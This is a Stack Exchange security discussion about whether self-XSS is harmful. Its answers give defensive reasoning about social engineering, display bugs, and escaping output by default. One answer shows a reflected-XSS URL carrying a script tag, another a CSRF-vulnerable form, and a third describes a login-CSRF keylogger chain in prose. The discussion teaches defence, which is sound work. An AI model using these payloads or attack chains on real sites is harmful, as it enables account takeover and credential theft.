How hard should I try to prevent a user from XSSing themselves?



59















Let's say a user can store some data in a web app. I'm talking only about the sort of data the user can THEMSELVES view, not data intended to be viewed by other users of the web app. (Or, if other users may view this data, then it is delivered to them in a more secure way.)



How horrible would it be to allow some XSS vulnerability in this data?



Of course, a purist's answer would clearly be: "No vulnerabilities are allowed". But honestly - why?



All that is possible is the user XSSing THEMSELVES. What's the harm in that? Other users are protected. And I can't see why someone would mount an attack against themselves (except a harmless one, in which case - again - no harm is done).



My gut feeling is that the above reasoning will raise some eyebrows... OK, then what am I failing to see?










Tags: xss, attacks














edited Apr 5 at 5:47 by SeldomNeedy
asked Apr 1 at 20:04 by gaazkam

  • 8





    How can you limit the scope of an XSS vuln to just some data? This is asking to open the door to everything getting compromised. Don't be lazy with it

    – Crumblez
    Apr 1 at 20:21






  • 18





    Can you be absolutely certain that the data will never be shown to any other user, especially including site admins?

    – pjc50
    Apr 2 at 8:20






  • 9





Also: You write "How badly should I try" - that looks like you believe preventing XSS will be difficult. Why is that? Normally, properly escaping everything on output should be enough.

    – sleske
    Apr 2 at 8:24






  • 12





    How often do you think people randomly copy&paste stuff from the internet? Ever heard of social engineering? Allowing self XSS is equivalent to allowing full XSS, IMHO.

    – Giacomo Alzetta
    Apr 2 at 12:31






  • 1





    @pjc50 - This exactly! The problem with programming something insecure/risky with the thought "well, it's not technically a problem because of XYZ" - is that you have to remember XYZ for perpetuity. "We got a new request - users want to be able to browse the formerly-private profile pages of each other." "We got a new request - admins need to be able to browse user content pages." "We got a new request - each day we want to grab the 'Inspirational Quote' from a random user and put it below our main banner". Etc.

    – Kevin
    Apr 4 at 15:00












9 Answers


















105














This is actually a real concept, "Self XSS", which is sufficiently common that if you open https://facebook.com and then open the developer tools, Facebook warns you about it with a large message printed directly in the console.



Obviously Facebook is a specific type of target, and whether this issue matters to you will depend on the exact nature of your site, but you may not be able to discount the idea of one user using social engineering techniques to get another user to attack themselves.
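
The warning Facebook prints is just styled console output, so any page can log something similar. As a minimal sketch of the general technique (this is not Facebook's actual code):

// Print a prominent warning on page load, for users who open the
// developer console after being told to paste something there.
console.log('%cStop!', 'color: red; font-size: 48px; font-weight: bold;');
console.log(
  '%cIf someone told you to copy and paste something here, it is ' +
  'almost certainly a scam and may give them access to your account.',
  'font-size: 16px;'
);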






answered Apr 1 at 20:28 by Rоry McCune


















  • 7





    I believe the Discord app (program, not the browser version) has the same type of message if you open the console with the shortcut Ctrl + Shift + I.

    – user7393973
    Apr 2 at 8:17






  • 34





    It's worth noting that this is a social engineering issue that would still exist even if the OP fixed all the vulnerabilities on their website. The user executes code in the console. In fact, IMO "self XSS" is a misnomer. Maybe we should call it "javascript scam" or something.

    – reed
    Apr 2 at 9:54






  • 19





    @MasonWheeler Why would you be disturbed by that specific thing?

    – Sumurai8
    Apr 2 at 15:24






  • 42





@MasonWheeler any JS from any website can output to the debug console with console.log and its sister functions - they can't actually manipulate the devtools in any way

    – Alex
    Apr 2 at 15:49






  • 6





@MasonWheeler although you were a little off-base with your assumptions about some simple console-logging, your concern about Facebook messing with developer tools more than they need to is pretty reasonable. See this question regarding Facebook using a Chrome bug to disable the console in order to combat scams: stackoverflow.com/questions/21692646/…

    – Felipe Warrener-Iglesias
    Apr 3 at 8:27


















39














You are right that it might not matter so much from an attack point of view, but from a usability point of view the user might come across some 'unexpected behavior'. A while ago I had to work with software that had an obvious SQL injection problem (the contractors couldn't/wouldn't fix it). This meant that unsuspecting users would enter something seemingly harmless, such as the name "O'Brien", and trigger an SQL injection; for computer-illiterate people this was unexpected behavior that was extremely difficult to troubleshoot. That exact failure is less likely with XSS, but consider the following: if a user uses <> instead of (), the data might seem to disappear. A proof of concept is below:



<html>
<head><title>HI</title></head>
<body>
<h1>WEBSITE</h1>
Hey my name is <travis>.
</body>
</html>


Note that when this page is rendered, the word 'travis' is not displayed, because the browser treats <travis> as an (unknown) HTML tag.
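
As a sketch of the usual fix, assigning user data as text rather than markup makes the same input display literally (the element id here is hypothetical):

// Setting user data via textContent treats it as plain text, so
// "<travis>" is displayed as typed instead of being parsed as a tag.
const name = '<travis>';
document.getElementById('greeting').textContent = 'Hey my name is ' + name + '.';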






edited Apr 3 at 21:08, answered Apr 1 at 20:51 by meowcat




















  • 1





    This is the real issue

    – DreamConspiracy
    Apr 2 at 7:03






  • 19





    They're both real issues.

    – Lightness Races in Orbit
    Apr 2 at 12:34






  • 28





    Being able to break an application by putting strange symbols into input-fields is unexpected behavior regardless of the user's computer-literacy; plenty of programmers named O'Brien probably expect that their name isn't some kind of impossible problem for a decent site to handle.

    – SeldomNeedy
    Apr 2 at 22:01







  • 6





    Poor little Bobby Tables

    – Wayne Werner
    Apr 3 at 11:31






  • 4





@WayneWerner lol yes, the contractors' reasoning for not fixing the issue was that only trusted people could use the application, and they had logs of who did what on the system, so they would know who SQL injected them... even though the logs were stored in the database... sigh.

    – meowcat
    Apr 3 at 21:18


















16














If the only way to insert malicious code is for the user to literally type it into your page themselves, then the attack vector is "self XSS", which was mentioned in another answer, and which is a social engineering attack you can't really prevent.



But if malicious code can also be loaded in other ways on your page, then you have a bigger problem. For example, if your website is vulnerable to reflected XSS or CSRF, an attacker can use those to make the user load malicious code.



Example of reflected XSS: if the data parameter is printed on the page without sanitizing it, an attacker can make the victim browse to the following URL, causing them to load malicious code.



https://www.example.com/search?data=<script src="..."></script>


Example of CSRF: if the submitted data is then printed on the page without sanitizing it and there's also no protection against CSRF, an attacker can make the victim post malicious data.



<form method="post" action="submit">
<input type="text" name="title">
<input type="text" name="note">
<input type="submit" value="submit">
<!-- NO TOKEN TO PREVENT CSRF HERE!!! -->
</form>


As you can see the problem is not only "who can see the data", but also "who can enter the data". But even if you were sure that the above examples don't apply to your situation, why should you still try to avoid XSS and always try to sanitize the data? Because sanitization should become a habit even if in some situations it might not seem really useful. If sanitization is not a habit, sooner or later you will forget to sanitize something that eventually leads to XSS.
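
For completeness, a minimal sketch of the missing CSRF protection, using Node's built-in crypto module (the session object and function names are illustrative, not any specific framework's API):

const crypto = require('crypto');

// When rendering the form: issue a random token, remember it server-side,
// and embed it in a hidden <input> so legitimate submissions carry it.
function issueCsrfToken(session) {
  session.csrfToken = crypto.randomBytes(32).toString('hex');
  return session.csrfToken;
}

// When handling the POST: reject any request whose token doesn't match.
function isValidCsrfToken(session, submitted) {
  if (typeof submitted !== 'string' || !session.csrfToken) return false;
  const expected = Buffer.from(session.csrfToken);
  const actual = Buffer.from(submitted);
  return expected.length === actual.length
    && crypto.timingSafeEqual(expected, actual);
}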




































    11














XSS is still bad even if the payload is tied to the account that created it. Sure, it's not as bad as "ordinary" XSS, but it's still not harmless.



Here's an example of an attack: First, I need to get the victim to log in as me. This can be done through social engineering, or through login CSRF if there is no protection against that. Second, I have the victim visit the affected page while logged in as me. The script then adds a keylogger to the site, so when the victim logs out and tries to log in as themselves, their password gets sent to me.



    There are many reasons an attack like this would fail, but it might just work. You should plug any and all XSS holes, no matter where they are.
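
To make the risk concrete, the keylogger step needs only a couple of lines. A sketch of the kind of payload described (the attacker URL is a placeholder):

// Runs in the victim's browser via the stored XSS: every keystroke,
// including a password typed at the next login, is sent to the attacker.
document.addEventListener('keydown', function (e) {
  navigator.sendBeacon('https://attacker.example/log', e.key);
});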
























    • 1





      I like this answer because someone offering "oh just log in as me and fix it real quick" is a very counter-intuitive way for them to attack you. I can imagine this working on even security-conscious people and it nicely addresses OP's constraints.

      – Carl Leth
      Apr 4 at 8:21


















    5














I think there is another case that may not be covered in the answers so far: the accidental self XSS. Users who run into an issue on a site may start googling for drop-in solutions that they copy and paste. Carefully crafted "solutions" could cause trouble.



The scope of the attack is the user accidentally harming themselves; it would be unlikely to harm other users. This is similar to how it can be dangerous to copy and paste bash commands found on the internet: a malicious site might offer Linux help but subtly include some command that exfiltrates user data.




































      4














      Allowing ostensibly "self-XSS" attacks may have secondary ramifications.



As an example, I recently saw an issue where a text field would, according to the bug report, remove all text after a less-than sign. The browser was interpreting the less-than sign as the start of an HTML tag.



Another issue I've seen is that such "self-XSS" fields cannot accept all valid input. For instance, consider a "notes" field, in which the user may wish to store something that they learned:



      One can make bold text by surrounding it with these tags: <b>Hello, bold world!</b>


      If your application allows "self-XSS" attacks, then the user will have difficulty adding such a note.






































        1














Something not mentioned in other answers is the potential for secondary security issues that can arise from a self-XSS.



Suppose your app has some really powerful/dangerous functionality that requires the user to enter their password again, such as changing an old password or allowing a third party to access their account. An attacker might gain temporary access to the account via an attack like cookie-jacking, an idle session (user away from their desk), or cross-site request forgery (CSRF). In any of these cases the attacker wouldn't be able to directly perform those powerful actions, because they wouldn't know the user's password. However, they could take advantage of the self-XSS vulnerability to perform a very convincing social-engineering attack to get the user's credentials, or set up an XSS payload that gives them persistent access to the user's account (every time the user logs in).



In the case of CSRF, a relatively harmless action might be transformed into a powerful attack by using the CSRF to plant a stored self-XSS that then gives the attacker access to the user's cookies or browser session. I've actually used this attack-chain technique several times when demonstrating vulnerabilities to developers.
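
A sketch of that chain: the attacker's page silently submits the vulnerable form from the victim's browser, turning the CSRF into a stored self-XSS (the site URL and field name are hypothetical):

// Hosted on the attacker's page; the browser attaches the victim's
// cookies when this cross-site POST is submitted.
const form = document.createElement('form');
form.method = 'POST';
form.action = 'https://victim.example/submit';
const note = document.createElement('input');
note.type = 'hidden';
note.name = 'note';
note.value = '<script src="https://attacker.example/payload.js"><\/script>';
form.appendChild(note);
document.body.appendChild(form);
form.submit();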






































          1














There are some great answers here from a pure security perspective. The self-XSS angle is absolutely correct, even if the top answer on that theme didn't explicitly spell out the connection it implies.



Namely: if people can be tricked into dropping self-XSS code into the dev console, why would you expect them not to be tricked into dropping it into some input element in your UI?



Some other answers tie that together with how this can create broader issues when it leads to account compromises (which, in my opinion, is inevitable once someone is tricked into self-XSSing).



          I think those are probably the top, immediate reasons. But I'd still like to address this from another angle:



          Development Practices: Implications of Allowing Self-XSS




          Let's say a user can store some data in a web app. I'm now only
          talking about that sort of data the user can THEMSELVES view, not that
          is intended to be viewed by other users of the webapp.




The problem with your supposition is that it assumes you don't prevent XSS on all output of user-provided data as a default practice: ideally as the default output mechanism of the class or function used to retrieve and output data, with any deviation requiring a specific parameter to select a different output-filtering method.



If your application is not coded so that the default method of output prevents XSS (different output targets, such as attributes versus elements, require different rules about what is and isn't allowed, hence 'default'), with more effort (not less) required to let anything through as native HTML (hopefully whitelisted and "purified")...



...then how sure are you that you won't have an accident where some reflection of user data back to the web allows XSS beyond just "data the user can THEMSELVES view"?



          Because mistakes happen. People forget steps when writing code. Failures occur in training where key points or even topics get missed. Some people do not "RTFM": even developers. Your application architecture/framework should be all about making sure that the path of least resistance when writing code is always the safest outcome, not the least safe outcome.



Allowing XSS to potentially occur based on user input should require a positive action, an explicit choice by the developer at each place it might occur, not simply be the default outcome of pulling stored user data and reflecting it back out. If your code is not written this way, preventing XSS by default and requiring an override parameter of some kind to disable the output purifying, then it's a sign that you need to re-evaluate your process.
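
As a sketch of what "safe by default, explicit opt-out" can look like (the function names are illustrative, not a particular framework's API):

// All user data passes through this on output by default.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Emitting raw HTML requires a positive, per-call-site decision.
function output(value, { allowRawHtml = false } = {}) {
  return allowRawHtml ? String(value) : escapeHtml(value);
}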




































            0














Although in this context we focus on the technical consequences of allowing a self-XSS, we should also consider its impact on the business: a self-XSS could cause unexpected behaviour (affecting user experience), so how would a user feel and react when running into it?



Furthermore, considering that an XSS vulnerability is easily avoidable, is it really worth not worrying about it? Just think of the possible consequences: opened support tickets, reported bugs, user discontent...






            share|improve this answer























              Your Answer








              StackExchange.ready(function()
              var channelOptions =
              tags: "".split(" "),
              id: "162"
              ;
              initTagRenderer("".split(" "), "".split(" "), channelOptions);

              StackExchange.using("externalEditor", function()
              // Have to fire editor after snippets, if snippets enabled
              if (StackExchange.settings.snippets.snippetsEnabled)
              StackExchange.using("snippets", function()
              createEditor();
              );

              else
              createEditor();

              );

              function createEditor()
              StackExchange.prepareEditor(
              heartbeatType: 'answer',
              autoActivateHeartbeat: false,
              convertImagesToLinks: false,
              noModals: true,
              showLowRepImageUploadWarning: true,
              reputationToPostImages: null,
              bindNavPrevention: true,
              postfix: "",
              imageUploader:
              brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
              contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
              allowUrls: true
              ,
              noCode: true, onDemand: true,
              discardSelector: ".discard-answer"
              ,immediatelyShowMarkdownHelp:true
              );



              );













              draft saved

              draft discarded


















              StackExchange.ready(
              function ()
              StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fsecurity.stackexchange.com%2fquestions%2f206579%2fhow-hard-should-i-try-to-prevent-a-user-from-xssing-themselves%23new-answer', 'question_page');

              );

              Post as a guest















              Required, but never shown

























              9 Answers
              9






              active

              oldest

              votes








              9 Answers
              9






              active

              oldest

              votes









              active

              oldest

              votes






              active

              oldest

              votes









              105














              This is actually a real concept, "Self XSS" which is sufficiently common that if you open https://facebook.com and then open the developer tools, they warn you about it as shown here



              Obviously Facebook is a specific type of target and whether this issue matters to you or not, would depend on the exact nature of your site, but you may not be able to discount the idea of one user using social engineering techniques to get another user to attack themselves.






              share|improve this answer


















              • 7





                I believe the Discord app (program, not the browser version) has the same type of message if you open the console with the shortcut Ctrl + Shift + I.

                – user7393973
                Apr 2 at 8:17






              • 34





                It's worth noting that this is a social engineering issue that would still exist even if the OP fixed all the vulnerabilities on their website. The user executes code in the console. In fact, IMO "self XSS" is a misnomer. Maybe we should call it "javascript scam" or something.

                – reed
                Apr 2 at 9:54






              • 19





                @MasonWheeler Why would you be disturbed by that specific thing?

                – Sumurai8
                Apr 2 at 15:24






              • 42





                @MasonWheeler any JS from any website can output to the debug console with console.log and it's sister functions - they can't actually manipulate the devtools in any way

                – Alex
                Apr 2 at 15:49






              • 6





                @MasonWheeler although you were a little off-base with your assumptions about some simple console-logging, your concern regarding Facebook messing with developer tools more than they need t is pretty reasonable. See this question regarding Facebook using a Chrome bug to disable the console, in order to combat scams: stackoverflow.com/questions/21692646/…

                – Felipe Warrener-Iglesias
                Apr 3 at 8:27















              105














              This is actually a real concept, "Self XSS" which is sufficiently common that if you open https://facebook.com and then open the developer tools, they warn you about it as shown here



              Obviously Facebook is a specific type of target and whether this issue matters to you or not, would depend on the exact nature of your site, but you may not be able to discount the idea of one user using social engineering techniques to get another user to attack themselves.






              share|improve this answer


















              • 7





                I believe the Discord app (program, not the browser version) has the same type of message if you open the console with the shortcut Ctrl + Shift + I.

                – user7393973
                Apr 2 at 8:17






              • 34





                It's worth noting that this is a social engineering issue that would still exist even if the OP fixed all the vulnerabilities on their website. The user executes code in the console. In fact, IMO "self XSS" is a misnomer. Maybe we should call it "javascript scam" or something.

                – reed
                Apr 2 at 9:54






              • 19





                @MasonWheeler Why would you be disturbed by that specific thing?

                – Sumurai8
                Apr 2 at 15:24






              • 42





                @MasonWheeler any JS from any website can output to the debug console with console.log and it's sister functions - they can't actually manipulate the devtools in any way

                – Alex
                Apr 2 at 15:49






              • 6





                @MasonWheeler although you were a little off-base with your assumptions about some simple console-logging, your concern regarding Facebook messing with developer tools more than they need t is pretty reasonable. See this question regarding Facebook using a Chrome bug to disable the console, in order to combat scams: stackoverflow.com/questions/21692646/…

                – Felipe Warrener-Iglesias
                Apr 3 at 8:27













              105












              105








              105







              This is actually a real concept, "Self XSS" which is sufficiently common that if you open https://facebook.com and then open the developer tools, they warn you about it as shown here



              Obviously Facebook is a specific type of target and whether this issue matters to you or not, would depend on the exact nature of your site, but you may not be able to discount the idea of one user using social engineering techniques to get another user to attack themselves.






              share|improve this answer













              This is actually a real concept, "Self XSS" which is sufficiently common that if you open https://facebook.com and then open the developer tools, they warn you about it as shown here



              Obviously Facebook is a specific type of target and whether this issue matters to you or not, would depend on the exact nature of your site, but you may not be able to discount the idea of one user using social engineering techniques to get another user to attack themselves.







              share|improve this answer












              share|improve this answer



              share|improve this answer










              answered Apr 1 at 20:28









              Rоry McCuneRоry McCune

              53.4k14114189




              53.4k14114189







              • 7





                I believe the Discord app (program, not the browser version) has the same type of message if you open the console with the shortcut Ctrl + Shift + I.

                – user7393973
                Apr 2 at 8:17






              • 34





                It's worth noting that this is a social engineering issue that would still exist even if the OP fixed all the vulnerabilities on their website. The user executes code in the console. In fact, IMO "self XSS" is a misnomer. Maybe we should call it "javascript scam" or something.

                – reed
                Apr 2 at 9:54






              • 19





                @MasonWheeler Why would you be disturbed by that specific thing?

                – Sumurai8
                Apr 2 at 15:24






              • 42





                @MasonWheeler any JS from any website can output to the debug console with console.log and it's sister functions - they can't actually manipulate the devtools in any way

                – Alex
                Apr 2 at 15:49






              • 6





                @MasonWheeler although you were a little off-base with your assumptions about some simple console-logging, your concern regarding Facebook messing with developer tools more than they need t is pretty reasonable. See this question regarding Facebook using a Chrome bug to disable the console, in order to combat scams: stackoverflow.com/questions/21692646/…

                – Felipe Warrener-Iglesias
                Apr 3 at 8:27












              • 7





                I believe the Discord app (program, not the browser version) has the same type of message if you open the console with the shortcut Ctrl + Shift + I.

                – user7393973
                Apr 2 at 8:17






              • 34





                It's worth noting that this is a social engineering issue that would still exist even if the OP fixed all the vulnerabilities on their website. The user executes code in the console. In fact, IMO "self XSS" is a misnomer. Maybe we should call it "javascript scam" or something.

                – reed
                Apr 2 at 9:54






              • 19





                @MasonWheeler Why would you be disturbed by that specific thing?

                – Sumurai8
                Apr 2 at 15:24






              • 42





                @MasonWheeler any JS from any website can output to the debug console with console.log and it's sister functions - they can't actually manipulate the devtools in any way

                – Alex
                Apr 2 at 15:49






              • 6





                @MasonWheeler although you were a little off-base with your assumptions about some simple console-logging, your concern regarding Facebook messing with developer tools more than they need t is pretty reasonable. See this question regarding Facebook using a Chrome bug to disable the console, in order to combat scams: stackoverflow.com/questions/21692646/…

                – Felipe Warrener-Iglesias
                Apr 3 at 8:27







              7




              7





              I believe the Discord app (program, not the browser version) has the same type of message if you open the console with the shortcut Ctrl + Shift + I.

              – user7393973
              Apr 2 at 8:17





              I believe the Discord app (program, not the browser version) has the same type of message if you open the console with the shortcut Ctrl + Shift + I.

              – user7393973
              Apr 2 at 8:17




              34




              34





              It's worth noting that this is a social engineering issue that would still exist even if the OP fixed all the vulnerabilities on their website. The user executes code in the console. In fact, IMO "self XSS" is a misnomer. Maybe we should call it "javascript scam" or something.

              – reed
              Apr 2 at 9:54





              It's worth noting that this is a social engineering issue that would still exist even if the OP fixed all the vulnerabilities on their website. The user executes code in the console. In fact, IMO "self XSS" is a misnomer. Maybe we should call it "javascript scam" or something.

              – reed
              Apr 2 at 9:54




              19




              19





              @MasonWheeler Why would you be disturbed by that specific thing?

              – Sumurai8
              Apr 2 at 15:24





              @MasonWheeler Why would you be disturbed by that specific thing?

              – Sumurai8
              Apr 2 at 15:24




              42




              42





              @MasonWheeler any JS from any website can output to the debug console with console.log and it's sister functions - they can't actually manipulate the devtools in any way

              – Alex
              Apr 2 at 15:49





              @MasonWheeler any JS from any website can output to the debug console with console.log and it's sister functions - they can't actually manipulate the devtools in any way

              – Alex
              Apr 2 at 15:49




              6




              6





              @MasonWheeler although you were a little off-base with your assumptions about some simple console-logging, your concern regarding Facebook messing with developer tools more than they need t is pretty reasonable. See this question regarding Facebook using a Chrome bug to disable the console, in order to combat scams: stackoverflow.com/questions/21692646/…

              – Felipe Warrener-Iglesias
              Apr 3 at 8:27





              @MasonWheeler although you were a little off-base with your assumptions about some simple console-logging, your concern regarding Facebook messing with developer tools more than they need t is pretty reasonable. See this question regarding Facebook using a Chrome bug to disable the console, in order to combat scams: stackoverflow.com/questions/21692646/…

              – Felipe Warrener-Iglesias
              Apr 3 at 8:27













              39














              Although you are right in that it might not matter so much from an attack point of view. From a usability point of view, the user might come across some 'unexpected behavior'. A while ago I used to have to work with software that had an obvious SQL injection problem (contractors couldn't/wouldn't fix it). This meant that unexpecting users would enter in something seemingly harmless such as their name "O'Brien", which would trigger an SQL injection and for computer illiterate people it was unexpected behavior, that was extremely difficult for them to troubleshoot. It is probably less likely with XSS, however consider the following if a user uses <> instead of () the data might seem to disappear. A proof of concept is below:



              <html>
              <head><title>HI</title></head>
              <body>
              <h1>WEBSITE</h1>
              Hey my name is <travis>.
              </body>
              </html>


              Note that when this website is rendered, the word 'travis', is not rendered.






              share|improve this answer




















              • 1





                This is the real issue

                – DreamConspiracy
                Apr 2 at 7:03






              • 19





                They're both real issues.

                – Lightness Races in Orbit
                Apr 2 at 12:34






              • 28





                Being able to break an application by putting strange symbols into input-fields is unexpected behavior regardless of the user's computer-literacy; plenty of programmers named O'Brien probably expect that their name isn't some kind of impossible problem for a decent site to handle.

                – SeldomNeedy
                Apr 2 at 22:01







              • 6





                Poor little Bobby Tables

                – Wayne Werner
                Apr 3 at 11:31






              • 4





                @WayneWerner lol yes, the contractors reasoning for not fixing the issue was because only trusted people could use the application, and they had logs of who did what on the system, so thy would know who SQL injected them... even though the logs where stored in the database... sigh.

                – meowcat
                Apr 3 at 21:18















              39














              Although you are right in that it might not matter so much from an attack point of view. From a usability point of view, the user might come across some 'unexpected behavior'. A while ago I used to have to work with software that had an obvious SQL injection problem (contractors couldn't/wouldn't fix it). This meant that unexpecting users would enter in something seemingly harmless such as their name "O'Brien", which would trigger an SQL injection and for computer illiterate people it was unexpected behavior, that was extremely difficult for them to troubleshoot. It is probably less likely with XSS, however consider the following if a user uses <> instead of () the data might seem to disappear. A proof of concept is below:



              <html>
              <head><title>HI</title></head>
              <body>
              <h1>WEBSITE</h1>
              Hey my name is <travis>.
              </body>
              </html>


              Note that when this website is rendered, the word 'travis', is not rendered.






              share|improve this answer




















              • 1





                This is the real issue

                – DreamConspiracy
                Apr 2 at 7:03






              • 19





                They're both real issues.

                – Lightness Races in Orbit
                Apr 2 at 12:34






              • 28





                Being able to break an application by putting strange symbols into input-fields is unexpected behavior regardless of the user's computer-literacy; plenty of programmers named O'Brien probably expect that their name isn't some kind of impossible problem for a decent site to handle.

                – SeldomNeedy
                Apr 2 at 22:01







              • 6





                Poor little Bobby Tables

                – Wayne Werner
                Apr 3 at 11:31






              • 4





                @WayneWerner lol yes, the contractors reasoning for not fixing the issue was because only trusted people could use the application, and they had logs of who did what on the system, so thy would know who SQL injected them... even though the logs where stored in the database... sigh.

                – meowcat
                Apr 3 at 21:18













              39












              39








              39







              Although you are right in that it might not matter so much from an attack point of view. From a usability point of view, the user might come across some 'unexpected behavior'. A while ago I used to have to work with software that had an obvious SQL injection problem (contractors couldn't/wouldn't fix it). This meant that unexpecting users would enter in something seemingly harmless such as their name "O'Brien", which would trigger an SQL injection and for computer illiterate people it was unexpected behavior, that was extremely difficult for them to troubleshoot. It is probably less likely with XSS, however consider the following if a user uses <> instead of () the data might seem to disappear. A proof of concept is below:



              <html>
              <head><title>HI</title></head>
              <body>
              <h1>WEBSITE</h1>
              Hey my name is <travis>.
              </body>
              </html>


              Note that when this website is rendered, the word 'travis', is not rendered.






              share|improve this answer















              Although you are right in that it might not matter so much from an attack point of view. From a usability point of view, the user might come across some 'unexpected behavior'. A while ago I used to have to work with software that had an obvious SQL injection problem (contractors couldn't/wouldn't fix it). This meant that unexpecting users would enter in something seemingly harmless such as their name "O'Brien", which would trigger an SQL injection and for computer illiterate people it was unexpected behavior, that was extremely difficult for them to troubleshoot. It is probably less likely with XSS, however consider the following if a user uses <> instead of () the data might seem to disappear. A proof of concept is below:



              <html>
              <head><title>HI</title></head>
              <body>
              <h1>WEBSITE</h1>
              Hey my name is <travis>.
              </body>
              </html>


              Note that when this website is rendered, the word 'travis', is not rendered.







              share|improve this answer














              share|improve this answer



              share|improve this answer








              edited Apr 3 at 21:08

























              answered Apr 1 at 20:51









              meowcatmeowcat

              699111




              699111







              • 1





                This is the real issue

                – DreamConspiracy
                Apr 2 at 7:03






              • 19





                They're both real issues.

                – Lightness Races in Orbit
                Apr 2 at 12:34






              • 28





                Being able to break an application by putting strange symbols into input-fields is unexpected behavior regardless of the user's computer-literacy; plenty of programmers named O'Brien probably expect that their name isn't some kind of impossible problem for a decent site to handle.

                – SeldomNeedy
                Apr 2 at 22:01







              • 6





                Poor little Bobby Tables

                – Wayne Werner
                Apr 3 at 11:31






              • 4





                @WayneWerner lol yes, the contractors reasoning for not fixing the issue was because only trusted people could use the application, and they had logs of who did what on the system, so thy would know who SQL injected them... even though the logs where stored in the database... sigh.

                – meowcat
                Apr 3 at 21:18












              • 1





                This is the real issue

                – DreamConspiracy
                Apr 2 at 7:03






              • 19





                They're both real issues.

                – Lightness Races in Orbit
                Apr 2 at 12:34






              • 28





                Being able to break an application by putting strange symbols into input-fields is unexpected behavior regardless of the user's computer-literacy; plenty of programmers named O'Brien probably expect that their name isn't some kind of impossible problem for a decent site to handle.

                – SeldomNeedy
                Apr 2 at 22:01







              • 6





                Poor little Bobby Tables

                – Wayne Werner
                Apr 3 at 11:31






              • 4





                @WayneWerner lol yes, the contractors reasoning for not fixing the issue was because only trusted people could use the application, and they had logs of who did what on the system, so thy would know who SQL injected them... even though the logs where stored in the database... sigh.

                – meowcat
                Apr 3 at 21:18







              1




              1





              This is the real issue

              – DreamConspiracy
              Apr 2 at 7:03





              This is the real issue

              – DreamConspiracy
              Apr 2 at 7:03




              19




              19





              They're both real issues.

              – Lightness Races in Orbit
              Apr 2 at 12:34





              They're both real issues.

              – Lightness Races in Orbit
              Apr 2 at 12:34




              28




              28





              Being able to break an application by putting strange symbols into input-fields is unexpected behavior regardless of the user's computer-literacy; plenty of programmers named O'Brien probably expect that their name isn't some kind of impossible problem for a decent site to handle.

              – SeldomNeedy
              Apr 2 at 22:01






              Being able to break an application by putting strange symbols into input-fields is unexpected behavior regardless of the user's computer-literacy; plenty of programmers named O'Brien probably expect that their name isn't some kind of impossible problem for a decent site to handle.

              – SeldomNeedy
              Apr 2 at 22:01





              6




              6





              Poor little Bobby Tables

              – Wayne Werner
              Apr 3 at 11:31





              Poor little Bobby Tables

              – Wayne Werner
              Apr 3 at 11:31




              4




              4





              @WayneWerner lol yes, the contractors reasoning for not fixing the issue was because only trusted people could use the application, and they had logs of who did what on the system, so thy would know who SQL injected them... even though the logs where stored in the database... sigh.

              – meowcat
              Apr 3 at 21:18





              @WayneWerner lol yes, the contractors reasoning for not fixing the issue was because only trusted people could use the application, and they had logs of who did what on the system, so thy would know who SQL injected them... even though the logs where stored in the database... sigh.

              – meowcat
              Apr 3 at 21:18











              16














              If the only way to insert malicious code is to literally type it on your webpage, then the attack vector would be "self xss", which was mentioned in another answer, and which is a social engineering attack you can't really prevent.



              But if malicious code can also be loaded in other ways on your page, then you have a bigger problem. For example, if your website is vulnerable to reflected XSS or CSRF, an attacker can use those to make the user load malicious code.



              Example of reflected XSS: if the data parameter is printed on the page without sanitizing it, an attacker can make the victim browse to the following URL to make them load malicious code.



              https://www.example.com/search?data=<script src="..."></script>


              Example of CSRF: if the submitted data is then printed on the page without sanitizing it and there's also no protection against CSRF, an attacker can make the victim post malicious data.



              <form method="post" action="submit">
              <input type="text" name="title">
              <input type="text" name="note">
              <input type="submit" value="submit">
              <!-- NO TOKEN TO PREVENT CSRF HERE!!! -->
              </form>


              As you can see the problem is not only "who can see the data", but also "who can enter the data". But even if you were sure that the above examples don't apply to your situation, why should you still try to avoid XSS and always try to sanitize the data? Because sanitization should become a habit even if in some situations it might not seem really useful. If sanitization is not a habit, sooner or later you will forget to sanitize something that eventually leads to XSS.






answered Apr 2 at 10:44 by reed
XSS is still bad, even if the payload is tied to the account that created it. Sure, it's not as bad as "ordinary" XSS, but it's still not harmless.

Here's an example of an attack: First, I need to get the victim to log in as me. This can be done through social engineering, or through login CSRF if there is no protection against that. Second, I have the victim visit the affected page logged in as me. The script then adds a keylogger to the site, so when the victim logs out and tries to log in as themselves, I get sent their password.

There are many reasons an attack like this could fail, but it might just work. You should plug any and all XSS holes, no matter where they are.
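
For illustration, a stored payload of the kind this attack describes could be as small as the following sketch (browser-side TypeScript; the exfiltration URL is hypothetical):

document.addEventListener("keydown", (event: KeyboardEvent) => {
  // Send each keystroke to the attacker; on the login form this
  // captures the victim's real password as they type it.
  void fetch("https://attacker.example/log", {
    method: "POST",
    mode: "no-cors",
    body: event.key,
  });
});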






answered Apr 2 at 11:59 by Anders

I like this answer because someone offering "oh, just log in as me and fix it real quick" is a very counter-intuitive way for them to attack you. I can imagine this working on even security-conscious people, and it nicely addresses the OP's constraints.

– Carl Leth
Apr 4 at 8:21
I think there is another use case that may not be listed in the answers so far, which is accidental self-XSS. Some users may run into an issue on a site and start googling for drop-in solutions that they copy and paste. Carefully crafted "solutions" could cause trouble.

The scope of the attack is for the user to accidentally self-harm, and it would be unlikely to harm other users. This is similar to how it can be dangerous to copy and paste bash commands that you find on the internet. A malicious site might offer Linux help but subtly include some command that exfiltrates user data in some way.






answered Apr 2 at 11:44 by zero298
Allowing ostensibly "self-XSS" attacks may have secondary ramifications.

As an example, I recently saw an issue where a text field would, according to the bug report, remove all text after a less-than sign. The browser was interpreting the less-than sign as the start of an HTML tag.

Another issue that I've seen is that fields which permit "self-XSS" do not faithfully accept arbitrary valid input. For instance, consider a "notes" field in which the user may wish to store something that they learned:

One can make bold text by surrounding it with these tags: <b>Hello, bold world!</b>

If your application allows "self-XSS" attacks, the browser will interpret the tags instead of displaying them, so the user will have difficulty adding such a note.
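
A minimal sketch of the contrast (illustrative TypeScript, not from the answer):

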